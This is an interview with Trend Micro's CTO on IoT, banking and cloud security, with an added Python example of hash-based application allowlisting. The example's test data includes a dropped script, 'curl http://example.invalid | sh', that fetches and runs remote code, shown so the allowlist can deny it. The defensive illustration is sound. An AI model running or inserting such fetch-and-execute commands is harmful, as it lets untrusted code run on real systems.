Mumbai: With over 30 years of computer and network security experience, Raimund Genes is currently chief technology officer at Trend Micro Inc., one of the leading security solutions providers in the world. In an interview, Genes talks about keeping hackers at bay in an increasingly connected world, devising a security strategy for the Internet of Things (IoT) and how machine learning may impact security in future. He will also address EmTech India 2017—an emerging technology conference organized by Mint and MIT Technology Review—on 10 March in New Delhi. Edited excerpts:
As the world is getting increasingly connected—e.g. connected cars, smart homes, smart cities, smart grids, etc.—are security firms able to keep pace with hackers? What steps, for instance, do you take at Trend Micro to keep ahead of the hacking race?
At Trend Micro, we have dedicated research teams looking at the digital underground to predict what the bad guys will do next. Based on this, we not only release yearly threat predictions but also brief our development teams on how to cope with these new attack methods. Thanks to this, we are seen as visionaries by analysts (Gartner’s Magic Quadrant); we are also able to execute on the vision. But to be honest, sometimes, we are also terribly wrong, like with our spyware predictions a few years ago. And, of course, within Trend Micro, we use a lot of our products to harden and lock down our back-end systems—for example, application control.
Cybercriminals have now even begun targeting IoT devices. What should firms do when devising an IoT strategy?
We need to separate IIoT (Industrial IoT) and IoT (consumer grade). Industrial devices have been around forever, and haven’t been designed to be reachable from the Internet. They are built to exist in a shielded environment—a segmented network which is isolated. And that’s how it still should be. The reality is that a lot of these systems were fine when released, but with new attack methods and unpatched vulnerabilities on these devices, it is very risky to have them in a hyper-connected environment. And the control systems (SCADA/ICS, or supervisory control and data acquisition/industrial control system) normally run on older versions of a standard operating system. These systems should be locked down, so no additional (unknown) processes can be installed there.
IoT devices, on the other hand, rely on connectivity. They have been designed with the cloud in mind—part of the functionality exists because of cloud-based data aggregation. For these devices, it is important to know what is connected and how the data is used by the device manufacturer. Companies should check with legal experts if it is, for example, OK to store health records (such as pulse, activity monitoring) in a foreign data centre. Basic guideline: Don’t be a department of “No”. You can’t stop IoT devices, but be aware of the risk, educate your staff and get backing from legal experts.
Cyberattacks clearly seem to be on the rise in the financial sector, especially with digital payments picking up around the globe. Even banks are under attack. What should banks do to keep cybercriminals at bay?
Banks need to be stricter about how computer systems are used internally. A server should only be touched by authorized and selected staff. Servers need different protection than standard endpoints. And even on a standard endpoint, in a banking environment, why should the user be able to install whatever kind of software on the desktop? We are talking about corporate assets here. Furthermore, bank employees need to be better educated about social engineering and spear phishing. I recommend frequent external penetration tests, at least once every six months.
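Two of the answers above come back to the same control: the control-system answer (lock down the host "so no additional (unknown) processes can be installed there") and the banking answer (an endpoint user should not be able to install "whatever kind of software"). The block below is an added illustration of how such an application-control policy decides, in practice, whether a program may run. It is not Trend Micro code and not part of the interview. The approved executables, their contents, the paths and the exec events are all constructed for the example; the point it adds is that a hash-based allowlist catches a tampered binary sitting at an approved path, which a path-only rule would wave through.

```python
"""Hash-based application control (allowlisting), added example.

Models the "lock down so no unknown process can run" control from the
interview. Everything here (paths, binary contents, exec events) is
constructed; on a real host the allowlist would be built from the
deployed, vendor-signed binaries and enforced by a kernel hook or EDR.
"""
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Tuple


def sha256_hex(data: bytes) -> str:
    """Content hash used as the allowlist identity of an executable."""
    return hashlib.sha256(data).hexdigest()


# Constructed "golden" images of the only programs approved on this host.
APPROVED_IMAGES: Dict[str, bytes] = {
    "/opt/scada/bin/historian": b"ELF...historian-v4.2...",
    "/opt/scada/bin/hmi": b"ELF...hmi-v4.2...",
    "/usr/sbin/sshd": b"ELF...openssh...",
}


def build_allowlist(images: Dict[str, bytes]) -> Dict[str, str]:
    """Snapshot path -> sha256 at deployment time (the 'known good' state)."""
    return {path: sha256_hex(blob) for path, blob in images.items()}


@dataclass(frozen=True)
class Verdict:
    path: str
    allowed: bool
    reason: str


def evaluate(path: str, image: bytes, allowlist: Dict[str, str]) -> Verdict:
    """Hash-based decision: the path must be listed AND the content must match."""
    expected = allowlist.get(path)
    if expected is None:
        return Verdict(path, False, "not on allowlist")
    if sha256_hex(image) != expected:
        return Verdict(path, False, "hash mismatch (modified or replaced)")
    return Verdict(path, True, "matches allowlist")


def evaluate_path_only(path: str, allowlist: Dict[str, str]) -> Verdict:
    """Weaker rule for contrast: trusts anything living at an approved path."""
    if path in allowlist:
        return Verdict(path, True, "approved path")
    return Verdict(path, False, "not on allowlist")


# Constructed exec events, as a kernel hook or EDR would hand them to policy.
EXEC_EVENTS: List[Tuple[str, bytes]] = [
    ("/opt/scada/bin/historian", APPROVED_IMAGES["/opt/scada/bin/historian"]),
    ("/opt/scada/bin/hmi", b"ELF...hmi-v4.2...PATCHED"),  # tampered, same path
    ("/tmp/update.sh", b"#!/bin/sh\ncurl http://example.invalid | sh"),  # dropped file
    ("/usr/sbin/sshd", APPROVED_IMAGES["/usr/sbin/sshd"]),
]


def enforce(events: List[Tuple[str, bytes]], allowlist: Dict[str, str]) -> List[Verdict]:
    """Apply the hash-based policy to every exec event."""
    return [evaluate(path, image, allowlist) for path, image in events]


def enforce_path_only(events: List[Tuple[str, bytes]], allowlist: Dict[str, str]) -> List[Verdict]:
    """Apply the path-only policy, to show what it misses."""
    return [evaluate_path_only(path, allowlist) for path, _ in events]


if __name__ == "__main__":
    allowlist = build_allowlist(APPROVED_IMAGES)
    for hashed, by_path in zip(enforce(EXEC_EVENTS, allowlist),
                               enforce_path_only(EXEC_EVENTS, allowlist)):
        print(f"{'ALLOW' if hashed.allowed else 'DENY '} {hashed.path:28} "
              f"hash-based: {hashed.reason:36} path-only: {by_path.reason}")
```

Run stand-alone it prints one line per exec event. The tampered `hmi` binary is denied by the hash rule and allowed by the path rule, which is why "locked down" in the sense the interview uses it means pinning content, not just locations, and why the allowlist snapshot itself has to be protected and rebuilt only through a controlled change process.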
Security analytics is being touted as the holy grail of information protection. What is your viewpoint?
There is no holy grail; there is no silver bullet. It is useful if you collect and analyse the right data. But will you find the needle in the haystack with it? A lot of companies don’t, because they don’t know what they are looking for. They only realize after a breach (which in most instances is reported by an external body) what happened, and then they could trace it back with security analytics. So, security analytics plays a role, but don’t forget a proactive element which blocks and shields—especially a solid and reliable IPS (intrusion prevention system)—with vulnerability shielding.
While cloud computing has matured over the years, most firms are still wary of putting their business-critical data on the cloud—especially the public cloud. How would you compare cloud security with on-premises security today?
If implemented well, putting data in a public cloud actually could be more secure and safe. Physical safety is not an issue, while your on-premises servers could burn down or a natural disaster could wipe them out. Cloud infrastructures are more resilient. And if you use the right cloud security controls and encryption, you could put it into the cloud.
How are automation, machine-learning and artificial intelligence impacting the way networks and data are protected or will be protected in the near future?
These are additional elements to make security products better. One method by itself is not effective against all kinds of attacks, but a proper combination detects more and protects better. Again, there is no silver bullet; you need a connected threat defence which automatically adjusts, adapts and learns. Just having an isolated product relying on machine-learning on the desktop, for example, will fail when probed by a sophisticated attacker. A combination of different and layered technologies is difficult to fool. All these new techniques make sense when combined with existing ones. But let’s accept that it is an arms race—after a while, we need new techniques again.
Do you think security tends to be given the short shrift when major growth initiatives such as Digital India are undertaken? How can the balance be maintained between security requirements and the need to grow very fast?
Yes, security is not top of mind, as it has a bad reputation of slowing down progress. I personally think that when you design something with security in mind, it does not slow down much. And when you look at the complete initiative, when you add security afterwards as a Band-Aid, it is more costly and delays or resets the initiative. One major data breach could wipe out in the public view everything positive about an initiative.